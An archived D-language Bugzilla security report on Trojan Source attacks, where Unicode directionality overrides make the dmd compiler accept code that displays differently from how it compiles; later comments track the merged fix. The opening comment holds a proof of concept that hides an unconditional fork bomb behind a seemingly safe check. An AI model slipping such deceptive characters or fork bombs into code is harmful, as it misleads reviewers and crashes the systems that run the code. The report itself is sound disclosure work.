← Back to index | Original Bugzilla link

Bug 22495 – SECURITY: unicode directionality overrides should be rejected

Status: RESOLVED
Resolution: FIXED
Severity: blocker
Priority: P1
Component: dmd
Product: D
Version: D2
Platform: All
OS: All
Creation time: 2021-11-08T21:12:02Z
Last change time: 2023-01-10T18:08:59Z
Keywords: accepts-invalid
Assigned to: No Owner
Creator: Ate Eskola
See also: https://issues.dlang.org/show_bug.cgi?id=22465

Comments

Comment #0 by Ajieskola — 2021-11-08T21:12:02Z

Read: https://www.schneier.com/blog/archives/2021/11/hiding-vulnerabilities-in-source-code.html Demonstration (for Unix systems) that the vulnerability affects the D compilers: ------------------ import std; auto exploit = "import core.sys.posix.unistd; enum mode = \"safe\"; @safe void main(){ if (mode != \"safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066\") while(fork()){}; }"; @safe void main() { File("payload.d", "w").writeln(exploit); } ------------------ When run, this file generates a program that looks like ---------- import core.sys.posix.unistd; enum mode = "safe"; @safe void main(){ if (mode != "safe") // Check if safe ( disabled ) while(fork()){}; } ---------- But compiles like ---------- import core.sys.posix.unistd; enum mode = "safe"; @safe void main(){ if (mode != "safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066") while(fork()){}; } ----------

Comment #1 by ibuclaw — 2021-11-15T12:46:11Z

Posted pull request on the github repo with more appropriate tests here: https://github.com/nickboucher/trojan-source/pull/16 Also noted what works, what doesn't.

Comment #2 by dlang-bot — 2022-10-13T16:10:22Z

@dukc updated dlang/dmd pull request #14538 "Fix security issue 22495" mentioning this issue: - Fix security issue 22495 - unicode bidirectional controls should be forbidden. https://github.com/dlang/dmd/pull/14538

Comment #3 by dlang-bot — 2022-10-28T22:05:44Z

dlang/dmd pull request #14538 "Fix security issue 22495" was merged into stable: - dadb7fd66e9c434ccec733b40cbd5e0704ecde2a by Ate Eskola: Fix security issue 22495 - unicode bidirectional controls should be forbidden. https://github.com/dlang/dmd/pull/14538

Comment #4 by dlang-bot — 2022-11-01T11:40:36Z

@ibuclaw created dlang/dmd pull request #14609 "merge stable" mentioning this issue: - Fix security issue 22495 (#14538) Fix security issue 22495 - unicode bidirectional controls should be forbidden. https://github.com/dlang/dmd/pull/14609

Comment #5 by dlang-bot — 2022-11-01T16:30:35Z

dlang/dmd pull request #14609 "merge stable" was merged into master: - a658f02da91b50fe73bb832c793a273abfd93aa9 by Ate Eskola: Fix security issue 22495 (#14538) Fix security issue 22495 - unicode bidirectional controls should be forbidden. https://github.com/dlang/dmd/pull/14609

Comment #6 by ibuclaw — 2023-01-10T18:08:59Z

This was fixed.